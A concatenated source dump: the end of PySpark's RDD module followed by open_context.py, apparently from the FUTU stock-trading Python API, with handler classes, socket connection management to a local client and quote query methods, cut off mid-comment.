self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _is_barrier(self):
return self.is_barrier
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
open_context.py
# -*- coding: utf-8 -*-
"""
Market quote and trade context setting
"""
from .quote_query import *
from .trade_query import *
from .utils import is_str
from multiprocessing import Queue
from threading import RLock, Thread
import select
import sys
import pandas as pd
import asyncore
import socket as sock
import time
from time import sleep
from abc import ABCMeta, abstractmethod
from struct import pack
import traceback
class RspHandlerBase(object):
"""callback function base class"""
def __init__(self):
pass
def on_recv_rsp(self, rsp_content):
"""receive response callback function"""
return 0, None
def on_error(self, error_str):
"""error callback function"""
pass
class StockQuoteHandlerBase(RspHandlerBase):
"""Base class for handle stock quote"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, quote_list = StockQuoteQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'data_date', 'data_time', 'last_price', 'open_price',
'high_price', 'low_price', 'prev_close_price',
'volume', 'turnover', 'turnover_rate', 'amplitude', 'suspension', 'listing_date', 'price_spread'
]
quote_frame_table = pd.DataFrame(quote_list, columns=col_list)
return RET_OK, quote_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class OrderBookHandlerBase(RspHandlerBase):
"""Base class for handling order book data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_book = OrderBookQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
return ret_code, order_book
def on_error(self, error_str):
"""error callback function"""
return error_str
class CurKlineHandlerBase(RspHandlerBase):
"""Base class for handling current Kline data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, kline_list = CurKlineQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time_key', 'open', 'close', 'high', 'low', 'volume', 'turnover', 'k_type']
kline_frame_table = pd.DataFrame(kline_list, columns=col_list)
return RET_OK, kline_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class TickerHandlerBase(RspHandlerBase):
"""Base class for handling ticker data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, ticker_list = TickerQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time', 'price', 'volume', 'turnover', "ticker_direction", 'sequence']
ticker_frame_table = pd.DataFrame(ticker_list, columns=col_list)
return RET_OK, ticker_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class RTDataHandlerBase(RspHandlerBase):
"""Base class for handling real-time data"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, rt_data_list = RtDataQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['code', 'time', 'data_status', 'opened_mins', 'cur_price', "last_close", 'avg_price',
'turnover', 'volume']
rt_data_table = pd.DataFrame(rt_data_list, columns=col_list)
return RET_OK, rt_data_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class BrokerHandlerBase(RspHandlerBase):
"""Base class for handling broker"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, bid_content, ask_content = BrokerQueueQuery.unpack_rsp(rsp_str)
if ret_code == RET_ERROR:
return ret_code, [bid_content, ask_content]
else:
bid_list = ['code', 'bid_broker_id', 'bid_broker_name', 'bid_broker_pos']
ask_list = ['code', 'ask_broker_id', 'ask_broker_name', 'ask_broker_pos']
bid_frame_table = pd.DataFrame(bid_content, columns=bid_list)
ask_frame_table = pd.DataFrame(ask_content, columns=ask_list)
return RET_OK, [bid_frame_table, ask_frame_table]
def on_error(self, error_str):
"""error callback function"""
return error_str
class HeartBeatHandlerBase(RspHandlerBase):
"""Base class for handling Heart Beat"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, timestamp = HeartBeatPush.unpack_rsp(rsp_str)
return ret_code, timestamp
def on_error(self, error_str):
"""error callback function"""
return error_str
class HKTradeOrderHandlerBase(RspHandlerBase):
"""Base class for handle trader order push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.hk_unpack_order_push_rsp(rsp_str)
order_list = [order_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealt_avg_price', 'dealt_qty',
'qty', 'orderid', 'order_type',
'order_side', 'price', 'status', 'submited_time', 'updated_time'
]
trade_frame_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class HKTradeOrderPreHandler(RspHandlerBase):
"""class for pre handle trader order push"""
def __init__(self, notify_obj=None):
self._notify_obj = notify_obj
super(HKTradeOrderPreHandler, self).__init__()
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.hk_unpack_order_push_rsp(rsp_str)
if ret_code == RET_OK:
orderid = order_info['orderid']
envtype = order_info['envtype']
status = order_info['status']
if self._notify_obj is not None:
self._notify_obj.on_trade_order_check(orderid, envtype, status)
return ret_code, None
class USTradeOrderHandlerBase(RspHandlerBase):
"""Base class for handle trader order push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.us_unpack_order_push_rsp(rsp_str)
order_list = [order_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealt_avg_price', 'dealt_qty',
'qty', 'orderid', 'order_type',
'order_side', 'price', 'status', 'submited_time', 'updated_time'
]
trade_frame_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class USTradeOrderPreHandler(RspHandlerBase):
"""class for pre handle trader order push"""
def __init__(self, notify_obj=None):
self._notify_obj = notify_obj
super(USTradeOrderPreHandler, self).__init__()
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, order_info = TradePushQuery.us_unpack_order_push_rsp(rsp_str)
if ret_code == RET_OK:
orderid = order_info['orderid']
envtype = order_info['envtype']
status = order_info['status']
if self._notify_obj is not None and is_USTrade_order_status_finish(status):
self._notify_obj.on_trade_order_check(orderid, envtype, status)
return ret_code, None
class HKTradeDealHandlerBase(RspHandlerBase):
"""Base class for handle trade deal push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, deal_info = TradePushQuery.hk_unpack_deal_push_rsp(rsp_str)
deal_list = [deal_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealid',
'orderid', 'qty', 'price', 'order_side',
'time', 'contra_broker_id', 'contra_broker_name'
]
trade_frame_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class USTradeDealHandlerBase(RspHandlerBase):
"""Base class for handle trade deal push"""
def on_recv_rsp(self, rsp_str):
"""receive response callback function"""
ret_code, msg, deal_info = TradePushQuery.us_unpack_deal_push_rsp(rsp_str)
deal_list = [deal_info]
if ret_code == RET_ERROR:
return ret_code, msg
else:
col_list = ['envtype', 'code', 'stock_name', 'dealid',
'orderid', 'qty', 'price', 'order_side', 'time',
]
trade_frame_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, trade_frame_table
def on_error(self, error_str):
"""error callback function"""
return error_str
class HandlerContext:
"""Handle Context"""
def __init__(self, cb_check_recv):
self.cb_check_recv = cb_check_recv
self._default_handler = RspHandlerBase()
self._handler_table = {"1030": {"type": StockQuoteHandlerBase, "obj": StockQuoteHandlerBase()},
"1031": {"type": OrderBookHandlerBase, "obj": OrderBookHandlerBase()},
"1032": {"type": CurKlineHandlerBase, "obj": CurKlineHandlerBase()},
"1033": {"type": TickerHandlerBase, "obj": TickerHandlerBase()},
"1034": {"type": RTDataHandlerBase, "obj": RTDataHandlerBase()},
"1035": {"type": BrokerHandlerBase, "obj": BrokerHandlerBase()},
"1036": {"type": HeartBeatHandlerBase, "obj": HeartBeatHandlerBase()},
"6200": {"type": HKTradeOrderHandlerBase, "obj": HKTradeOrderHandlerBase()},
"6201": {"type": HKTradeDealHandlerBase, "obj": HKTradeDealHandlerBase()},
"7200": {"type": USTradeOrderHandlerBase, "obj": USTradeOrderHandlerBase()},
"7201": {"type": USTradeDealHandlerBase, "obj": USTradeDealHandlerBase()},
}
self._pre_handler_table = {
"6200": {"type": HKTradeOrderPreHandler, "obj": HKTradeOrderPreHandler()},
"7200": {"type": USTradeOrderPreHandler, "obj": USTradeOrderPreHandler()},
}
# self._pre_handler_table = self._handler_table.copy()
def set_pre_handler(self, handler):
'''set the pre handler object used for push data
:return: RET_ERROR or RET_OK
'''
set_flag = False
for protoc in self._pre_handler_table:
if isinstance(handler, self._pre_handler_table[protoc]["type"]):
self._pre_handler_table[protoc]["obj"] = handler
return RET_OK
if set_flag is False:
return RET_ERROR
def set_handler(self, handler):
"""
set the callback processing object used by the receiving thread after data is received. Users should register
their own callback objects in order to achieve event-driven handling.
:param handler: the callback handler object (derived from one of the handler base classes)
:return: ret_error or ret_ok
"""
set_flag = False
for protoc in self._handler_table:
if isinstance(handler, self._handler_table[protoc]["type"]):
self._handler_table[protoc]["obj"] = handler
return RET_OK
if set_flag is False:
return RET_ERROR
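# Hedged usage sketch (not part of the original source): registering a custom
# push handler. A caller subclasses one of the *HandlerBase classes above and
# passes an instance to set_handler(); recv_func() then dispatches pushed data
# to it. Assumes an OpenQuoteContext (defined later in this module) connected
# to a local FUTU client.
#
#   class MyQuoteHandler(StockQuoteHandlerBase):
#       def on_recv_rsp(self, rsp_str):
#           ret, data = super(MyQuoteHandler, self).on_recv_rsp(rsp_str)
#           if ret == RET_OK:
#               print(data)            # quote DataFrame pushed by the client
#           return ret, data
#
#   quote_ctx = OpenQuoteContext(host='127.0.0.1', port=11111)
#   quote_ctx.set_handler(MyQuoteHandler())
#   quote_ctx.start()                  # begin processing pushed data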
def recv_func(self, rsp_str):
"""receive response callback function"""
if self.cb_check_recv is not None and not self.cb_check_recv():
return
ret, msg, rsp = extract_pls_rsp(rsp_str)
if ret != RET_OK:
error_str = msg + rsp_str
print(error_str)
return
protoc_num = rsp["Protocol"]
handler = self._default_handler
pre_handler = None
if protoc_num in self._handler_table:
handler = self._handler_table[protoc_num]['obj']
if protoc_num in self._pre_handler_table:
pre_handler = self._pre_handler_table[protoc_num]['obj']
if pre_handler is not None:
pre_handler.on_recv_rsp(rsp_str)
ret, result = handler.on_recv_rsp(rsp_str)
if ret != RET_OK:
error_str = result
handler.on_error(error_str)
@staticmethod
def error_func(err_str):
"""error callback function"""
print(err_str)
class _SyncNetworkQueryCtx:
"""
Network query context; manages the connection between the Python program and the FUTU client program.
A short (non-persistent) connection is created by setting the long_conn parameter to False, which means the
TCP connection is closed once a query session finishes.
A long (persistent) connection is created by setting the long_conn parameter to True, which means the TCP
connection is kept open after a query session finishes, waiting for the next query.
"""
def __init__(self, host, port, long_conn=True, connected_handler=None):
self.s = None
self.__host = host
self.__port = port
self.long_conn = long_conn
self._socket_lock = RLock()
self._connected_handler = connected_handler
self._is_loop_connecting = False
def close_socket(self):
"""close socket"""
self._socket_lock.acquire()
self._force_close_session()
self._socket_lock.release()
def is_sock_ok(self, timeout_select):
"""check if socket is OK"""
self._socket_lock.acquire()
try:
ret = self._is_socket_ok(timeout_select)
finally:
self._socket_lock.release()
return ret
def _is_socket_ok(self, timeout_select):
if not self.s:
return False
_, _, sel_except = select.select([self.s], [], [], timeout_select)
if self.s in sel_except:
return False
return True
def reconnect(self):
"""reconnect"""
self._socket_create_and_loop_connect()
def network_query(self, req_str):
"""
the function sends req_str to the FUTU client and tries to get a response from it.
:param req_str: request string
:return: rsp_str
"""
try:
ret, msg = self._create_session()
self._socket_lock.acquire()
if ret != RET_OK:
return ret, msg, None
# rsp_str = ''
s_buf = str2binary(req_str)
s_cnt = self.s.send(s_buf)
rsp_buf = b''
while rsp_buf.find(b'\r\n\r\n') < 0:
try:
recv_buf = self.s.recv(5 * 1024 * 1024)
rsp_buf += recv_buf
if recv_buf == b'':
raise Exception("_SyncNetworkQueryCtx : remote server close")
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
error_str = ERROR_STR_PREFIX + str(
err) + ' when receiving after sending %s bytes. For req: ' % s_cnt + req_str
self._force_close_session()
return RET_ERROR, error_str, None
rsp_str = binary2str(rsp_buf)
self._close_session()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
error_str = ERROR_STR_PREFIX + str(err) + ' when sending. For req: ' + req_str
self._force_close_session()
return RET_ERROR, error_str, None
finally:
self._socket_lock.release()
return RET_OK, "", rsp_str
def _socket_create_and_loop_connect(self):
self._socket_lock.acquire()
is_socket_lock = True
if self._is_loop_connecting:
self._socket_lock.release()
return RET_ERROR, "is loop connecting, can't create_session"
self._is_loop_connecting = True
if self.s is not None:
self._force_close_session()
while True:
try:
if not is_socket_lock:
is_socket_lock = True
self._socket_lock.acquire()
s = sock.socket()
s.setsockopt(sock.SOL_SOCKET, sock.SO_REUSEADDR, 0)
s.setsockopt(sock.SOL_SOCKET, sock.SO_LINGER, pack("ii", 0, 0))
s.settimeout(10)
self.s = s
self.s.connect((self.__host, self.__port))
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
err_msg = ERROR_STR_PREFIX + str(err)
print("socket connect err:{}".format(err_msg))
self.s = None
if s:
s.close()
del s
sleep(1.5)
continue
if self._connected_handler is not None:
is_socket_lock = False
self._socket_lock.release()
sock_ok, is_retry = self._connected_handler.notify_sync_socket_connected(self)
if not sock_ok:
self._force_close_session()
if is_retry:
print("wait to connect futunn plugin server")
sleep(1.5)
continue
else:
return RET_ERROR, "obj is closed"
else:
break
self._is_loop_connecting = False
if is_socket_lock:
# is_socket_lock = False
self._socket_lock.release()
return RET_OK, ''
def _create_session(self):
if self.long_conn is True and self.s is not None:
return RET_OK, ""
ret, msg = self._socket_create_and_loop_connect()
if ret != RET_OK:
return ret, msg
return RET_OK, ""
def _force_close_session(self):
if self.s is None:
return
self.s.close()
del self.s
self.s = None
def _close_session(self):
if self.s is None or self.long_conn is True:
return
self.s.close()
self.s = None
def __del__(self):
if self.s is not None:
self.s.close()
self.s = None
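# Hedged usage sketch (not part of the original source): a raw synchronous
# query. The context frames requests and responses with a b'\r\n\r\n'
# delimiter and keeps the TCP connection open when long_conn=True. Assumes a
# FUTU client listening on 127.0.0.1:11111 and a req_str already produced by
# one of the *Query.pack_req helpers; handle_response() is a placeholder.
#
#   ctx = _SyncNetworkQueryCtx('127.0.0.1', 11111, long_conn=True)
#   ret, msg, rsp_str = ctx.network_query(req_str)
#   if ret == RET_OK:
#       handle_response(rsp_str)       # rsp_str is the raw response text
#   ctx.close_socket()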
class _AsyncThreadCtrl(object):
def __init__(self):
self.__list_aync = []
self.__net_proc = None
self.__stop = False
def add_async(self, async_obj):
if async_obj in self.__list_aync:
return
self.__list_aync.append(async_obj)
if self.__net_proc is None:
self.__stop = False
self.__net_proc = Thread(target=self._thread_aysnc_net_proc, args=())
self.__net_proc.start()
def remove_async(self, async_obj):
if async_obj not in self.__list_aync:
return
self.__list_aync.remove(async_obj)
if len(self.__list_aync) == 0:
self.__stop = True
self.__net_proc.join(timeout=5)
self.__net_proc = None
def _thread_aysnc_net_proc(self):
while not self.__stop:
asyncore.loop(timeout=0.001, count=5)
class _AsyncNetworkManager(asyncore.dispatcher_with_send):
async_thread_ctrl = _AsyncThreadCtrl()
def __init__(self, host, port, handler_ctx, close_handler=None):
self.__host = host
self.__port = port
self.__close_handler = close_handler
asyncore.dispatcher_with_send.__init__(self)
self._socket_create_and_connect()
time.sleep(0.1)
self.rsp_buf = b''
self.handler_ctx = handler_ctx
self.async_thread_ctrl.add_async(self)
def __del__(self):
self.async_thread_ctrl.remove_async(self)
def reconnect(self):
"""reconnect"""
self._socket_create_and_connect()
def close_socket(self):
"""close socket"""
self.async_thread_ctrl.remove_async(self)
self.close()
def handle_read(self):
"""
deal with incoming JSON packets
:return: err
"""
delimiter = b'\r\n\r\n'
rsp_str = u''
try:
recv_buf = self.recv(5 * 1024 * 1024)
if recv_buf == b'':
raise Exception("_AsyncNetworkManager : remote server close")
self.rsp_buf += recv_buf
loc = self.rsp_buf.find(delimiter)
while loc >= 0:
rsp_binary = self.rsp_buf[0:loc]
loc += len(delimiter)
self.rsp_buf = self.rsp_buf[loc:]
rsp_str = binary2str(rsp_binary)
self.handler_ctx.recv_func(rsp_str)
loc = self.rsp_buf.find(delimiter)
except Exception as e:
if isinstance(e, IOError) and e.errno == 10035:
return
traceback.print_exc()
err = sys.exc_info()[1]
self.handler_ctx.error_func(str(err))
print(rsp_str)
return
def network_query(self, req_str):
"""query network status"""
s_buf = str2binary(req_str)
self.send(s_buf)
def __del__(self):
self.async_thread_ctrl.remove_async(self)
self.close()
def handle_close(self):
"""handle close"""
if self.__close_handler is not None:
self.__close_handler.notify_async_socket_close(self)
def _socket_create_and_connect(self):
if self.socket is not None:
self.close()
if self.__host is not None and self.__port is not None:
self.create_socket(sock.AF_INET, sock.SOCK_STREAM)
self.connect((self.__host, self.__port))
class OpenContextBase(object):
"""Base class for set context"""
__metaclass__ = ABCMeta
def __init__(self, host, port, sync_enable, async_enable):
self.__host = host
self.__port = port
self.__sync_socket_enable = sync_enable
self.__async_socket_enable = async_enable
self._async_ctx = None
self._sync_net_ctx = None
self._thread_check_sync_sock = None
self._thread_is_exit = False
self._check_last_req_time = None
self._is_socket_reconnecting = False
self._is_obj_closed = False
self._handlers_ctx = None
self._proc_run = False
self._sync_query_lock = RLock()
self._count_reconnect = 0
if not self.__sync_socket_enable and not self.__async_socket_enable:
raise Exception('you should specify at least one socket type to create !')
self._socket_reconnect_and_wait_ready()
def __del__(self):
self._close()
@abstractmethod
def close(self):
"""
call close() on the old object before creating a new one in a loop; otherwise the socket may hit error 10053 or similar!
"""
self._close()
@abstractmethod
def on_api_socket_reconnected(self):
"""
callback after reconnect ok
"""
# print("on_api_socket_reconnected obj ID={}".format(id(self)))
pass
def _close(self):
self._is_obj_closed = True
self.stop()
if self._thread_check_sync_sock is not None:
self._thread_check_sync_sock.join(timeout=10)
self._thread_check_sync_sock = None
assert self._thread_is_exit
if self._sync_net_ctx is not None:
self._sync_net_ctx.close_socket()
self._sync_net_ctx = None
if self._async_ctx is not None:
self._async_ctx.close_socket()
self._async_ctx = None
if self._sync_query_lock is not None:
self._sync_query_lock = None
self._handlers_ctx = None
def start(self):
"""
start the receiving thread, asynchronously receiving the data pushed by the client
"""
self._proc_run = True
def stop(self):
"""
stop the receiving thread; no longer receive data pushed by the client
"""
self._proc_run = False
def set_handler(self, handler):
"""
set the async push handler object
:param handler: an object derived from RspHandlerBase
:return: ret_error or ret_ok
"""
if self._handlers_ctx is not None:
return self._handlers_ctx.set_handler(handler)
return RET_ERROR
def set_pre_handler(self, handler):
'''set pre handler'''
if self._handlers_ctx is not None:
return self._handlers_ctx.set_pre_handler(handler)
return RET_ERROR
def get_global_state(self):
"""
get api server(exe) global state
:return: RET_OK, state_dict | err_code, msg
"""
query_processor = self._get_sync_query_processor(GlobalStateQuery.pack_req,
GlobalStateQuery.unpack_rsp)
kargs = {"state_type": 0}
ret_code, msg, state_dict = query_processor(**kargs)
if ret_code != RET_OK:
return ret_code, msg
return RET_OK, state_dict
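# Hedged usage sketch (not part of the original source): checking that the
# local FUTU client is logged in before issuing queries. Assumes an
# OpenQuoteContext bound to `quote_ctx`; the key names mirror the ones read in
# notify_sync_socket_connected() below.
#
#   ret, state = quote_ctx.get_global_state()
#   if ret == RET_OK:
#       print(state['Quote_Logined'], state['Trade_Logined'])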
def _is_proc_run(self):
return self._proc_run
def _send_sync_req(self, req_str):
"""
send a synchronous request
"""
ret, msg, content = self._sync_net_ctx.network_query(req_str)
if ret != RET_OK:
return RET_ERROR, msg, None
return RET_OK, msg, content
def _send_async_req(self, req_str):
"""
send an asynchronous request
"""
if self._async_ctx:
self._async_ctx.send(req_str)
return RET_OK, ''
return RET_ERROR, 'async_ctx is None!'
def _get_sync_query_processor(self, pack_func, unpack_func):
"""
build a synchronous query processor
:param pack_func: function used to pack the request
:param unpack_func: function used to unpack the response
:return: sync_query_processor
"""
send_req = self._send_sync_req
def sync_query_processor(**kargs):
"""sync query processor"""
msg_obj_del = "the object may have been deleted!"
if self._is_obj_closed or self._sync_query_lock is None:
return RET_ERROR, msg_obj_del, None
try:
self._sync_query_lock.acquire()
if self._is_obj_closed:
return RET_ERROR, msg_obj_del, None
ret_code, msg, req_str = pack_func(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg, None
ret_code, msg, rsp_str = send_req(req_str)
if ret_code == RET_ERROR:
return ret_code, msg, None
ret_code, msg, content = unpack_func(rsp_str)
if ret_code == RET_ERROR:
return ret_code, msg, None
return RET_OK, msg, content
finally:
try:
if self._sync_query_lock:
self._sync_query_lock.release()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
print(err)
return sync_query_processor
def _socket_reconnect_and_wait_ready(self):
"""
sync_socket & async_socket recreate
:return: None
"""
if self._is_socket_reconnecting or self._is_obj_closed or self._sync_query_lock is None:
return
self._count_reconnect += 1
# print("_socket_reconnect_and_wait_ready - count = %s" % self._count_reconnect)
try:
self._is_socket_reconnecting = True
self._sync_query_lock.acquire()
# create async socket (for push data)
if self.__async_socket_enable:
if self._async_ctx is None:
self._handlers_ctx = HandlerContext(self._is_proc_run)
self._async_ctx = _AsyncNetworkManager(self.__host, self.__port, self._handlers_ctx, self)
else:
self._async_ctx.reconnect()
# create sync socket and loop wait to connect api server
if self.__sync_socket_enable:
self._thread_check_sync_sock = None
if self._sync_net_ctx is None:
self._sync_net_ctx = _SyncNetworkQueryCtx(self.__host, self.__port,
long_conn=True, connected_handler=self)
self._sync_net_ctx.reconnect()
# notify reconnected
self.on_api_socket_reconnected()
# run thread to check sync socket state
if self.__sync_socket_enable:
self._thread_check_sync_sock = Thread(target=self._thread_check_sync_sock_fun)
self._thread_check_sync_sock.setDaemon(True)
self._thread_check_sync_sock.start()
finally:
try:
self._is_socket_reconnecting = False
if self._sync_query_lock:
self._sync_query_lock.release()
except Exception as e:
traceback.print_exc()
err = sys.exc_info()[1]
print(err)
def notify_sync_socket_connected(self, sync_ctxt):
"""
:param sync_ctxt:
:return: (is_socket_ok[bool], is_to_retry_connect[bool])
"""
if self._is_obj_closed or self._sync_net_ctx is None or self._sync_net_ctx is not sync_ctxt:
return False, False
is_ready = False
ret_code, state_dict = self.get_global_state()
if ret_code == 0:
is_ready = int(state_dict['Quote_Logined']) != 0 and int(state_dict['Trade_Logined']) != 0
# check whether the client version meets the minimum requirement
if is_ready:
cur_ver = state_dict['Version']
if cur_ver < NN_VERSION_MIN:
str_ver = cur_ver if cur_ver else str('unknown')
str_error = "The client version connected to the API is too low. Current version: '%s', minimum required version: '%s'. Please contact the administrator to reinstall the Niuniu API client!" % (str_ver, NN_VERSION_MIN)
raise Exception(str_error)
return is_ready, True
def notify_async_socket_close(self, async_ctx):
"""
AsyncNetworkManager onclose callback
"""
if self._is_obj_closed or self._async_ctx is None or async_ctx is not self._async_ctx:
return
# auto reconnect
self._socket_reconnect_and_wait_ready()
def _thread_check_sync_sock_fun(self):
"""
thread fun : timer to check socket state
"""
thread_handle = self._thread_check_sync_sock
while True:
if self._thread_check_sync_sock is not thread_handle:
if self._thread_check_sync_sock is None:
self._thread_is_exit = True
print ('check_sync_sock thread : exit by obj changed...')
return
if self._is_obj_closed:
self._thread_is_exit = True
return
sync_net_ctx = self._sync_net_ctx
if sync_net_ctx is None:
self._thread_is_exit = True
return
# select sock to get err state
if not sync_net_ctx.is_sock_ok(0.01):
self._thread_is_exit = True
if self._thread_check_sync_sock is thread_handle and not self._is_obj_closed:
print("check_sync_sock thread : reconnect !")
self._socket_reconnect_and_wait_ready()
return
else:
sleep(0.1)
# send req loop per 10 seconds
cur_time = time.time()
if (self._check_last_req_time is None) or (cur_time - self._check_last_req_time > 10):
self._check_last_req_time = cur_time
if self._thread_check_sync_sock is thread_handle:
self.get_global_state()
class OpenQuoteContext(OpenContextBase):
"""Class for set context of stock quote"""
def __init__(self, host='127.0.0.1', port=11111):
self._ctx_subscribe = set()
super(OpenQuoteContext, self).__init__(host, port, True, True)
def close(self):
"""
call close() on the old object before creating a new one in a loop; otherwise the socket may hit error 10053 or similar!
"""
super(OpenQuoteContext, self).close()
def on_api_socket_reconnected(self):
"""for API socket reconnected"""
# auto subscribe
set_sub = self._ctx_subscribe.copy()
for (stock_code, data_type, push) in set_sub:
for i in range(3):
ret, _ = self.subscribe(stock_code, data_type, push)
if ret == 0:
break
else:
sleep(1)
def get_trading_days(self, market, start_date=None, end_date=None):
"""get the trading days"""
if market is None or is_str(market) is False:
error_str = ERROR_STR_PREFIX + "the type of market param is wrong"
return RET_ERROR, error_str
if start_date is not None and is_str(start_date) is False:
error_str = ERROR_STR_PREFIX + "the type of start_date param is wrong"
return RET_ERROR, error_str
if end_date is not None and is_str(end_date) is False:
error_str = ERROR_STR_PREFIX + "the type of end_date param is wrong"
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(TradeDayQuery.pack_req,
TradeDayQuery.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'market': market, 'start_date': start_date, "end_date": end_date}
ret_code, msg, trade_day_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
return RET_OK, trade_day_list
def get_stock_basicinfo(self, market, stock_type='STOCK'):
"""get the basic information of stock"""
param_table = {'market': market, 'stock_type': stock_type}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(StockBasicInfoQuery.pack_req,
StockBasicInfoQuery.unpack_rsp)
kargs = {"market": market, 'stock_type': stock_type}
ret_code, msg, basic_info_list = query_processor(**kargs)
if ret_code == RET_ERROR:
return ret_code, msg
col_list = ['code', 'name', 'lot_size', 'stock_type', 'stock_child_type', "owner_stock_code", "listing_date",
"stockid"]
basic_info_table = pd.DataFrame(basic_info_list, columns=col_list)
return RET_OK, basic_info_table
def get_multiple_history_kline(self, codelist, start=None, end=None, ktype='K_DAY', autype='qfq'):
if is_str(codelist):
codelist = codelist.split(',')
elif isinstance(codelist, list):
pass
else:
raise Exception("code list must be like ['HK.00001', 'HK.00700'] or 'HK.00001,HK.00700'")
result = []
for code in codelist:
ret, data = self.get_history_kline(code, start, end, ktype, autype)
if ret != RET_OK:
raise Exception('get history kline error {},{},{},{}'.format(code, start, end, ktype))
result.append(data)
return 0, result
def get_history_kline(self, code, start=None, end=None, ktype='K_DAY', autype='qfq', fields=[KL_FIELD.ALL]):
'''
get the local historical K-line data; the K-line data must be downloaded first (see the help documentation)
:param code: stock code
:param start: start date, '%Y-%m-%d'
:param end: end date, '%Y-%m-%d'
:param ktype: K-line type, see the KTYPE_MAP definition, e.g. 'K_1M', 'K_DAY', ...
:param autype: adjustment type, see the AUTYPE_MAP definition: 'None', 'qfq', 'hfq'
:param fields: list of fields to return, see the KL_FIELD definition, e.g. KL_FIELD.ALL, KL_FIELD.OPEN, ...
:return: (ret, data). If ret == 0, data is a pandas DataFrame whose columns include 'code', 'time_key', 'open',
'close', 'high', 'low', 'volume', 'turnover', 'pe_ratio', 'turnover_rate', 'change_rate'.
If ret != 0, data is an error string.
'''
if start is not None and is_str(start) is False:
error_str = ERROR_STR_PREFIX + "the type of start param is wrong"
return RET_ERROR, error_str
if end is not None and is_str(end) is False:
error_str = ERROR_STR_PREFIX + "the type of end param is wrong"
return RET_ERROR, error_str
req_fields = unique_and_normalize_list(fields)
if not fields:
req_fields = copy(KL_FIELD.ALL_REAL)
req_fields = KL_FIELD.normalize_field_list(req_fields)
if not req_fields:
error_str = ERROR_STR_PREFIX + "the type of fields param is wrong"
return RET_ERROR, error_str
if autype is None:
autype = 'None'
param_table = {'code': code, 'ktype': ktype, 'autype': autype}
for x in param_table:
param = param_table[x]
if param is None or is_str(param) is False:
error_str = ERROR_STR_PREFIX + "the type of %s param is wrong" % x
return RET_ERROR, error_str
req_start = start
max_kl_num = 1000
data_finish = False
list_ret = []
# request the data in a loop to avoid timeouts from fetching too much at once
while not data_finish:
kargs = {"stock_str": code, "start_date": req_start, "end_date": end, "ktype": ktype, "autype": autype, "fields": req_fields, "max_num": max_kl_num}
query_processor = self._get_sync_query_processor(HistoryKlineQuery.pack_req,
HistoryKlineQuery.unpack_rsp)
ret_code, msg, content = query_processor(**kargs)
if ret_code != RET_OK:
return ret_code, msg
list_kline, has_next, next_time = content
data_finish = (not has_next) or (not next_time)
req_start = next_time
for dict_item in list_kline:
list_ret.append(dict_item)
# header columns
col_list = ['code']
for field in req_fields:
str_field = KL_FIELD.DICT_KL_FIELD_STR[field]
if str_field not in col_list:
col_list.append(str_field)
kline_frame_table = pd.DataFrame(list_ret, columns=col_list)
return RET_OK, kline_frame_table
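# Hedged usage sketch (not part of the original source): fetching daily
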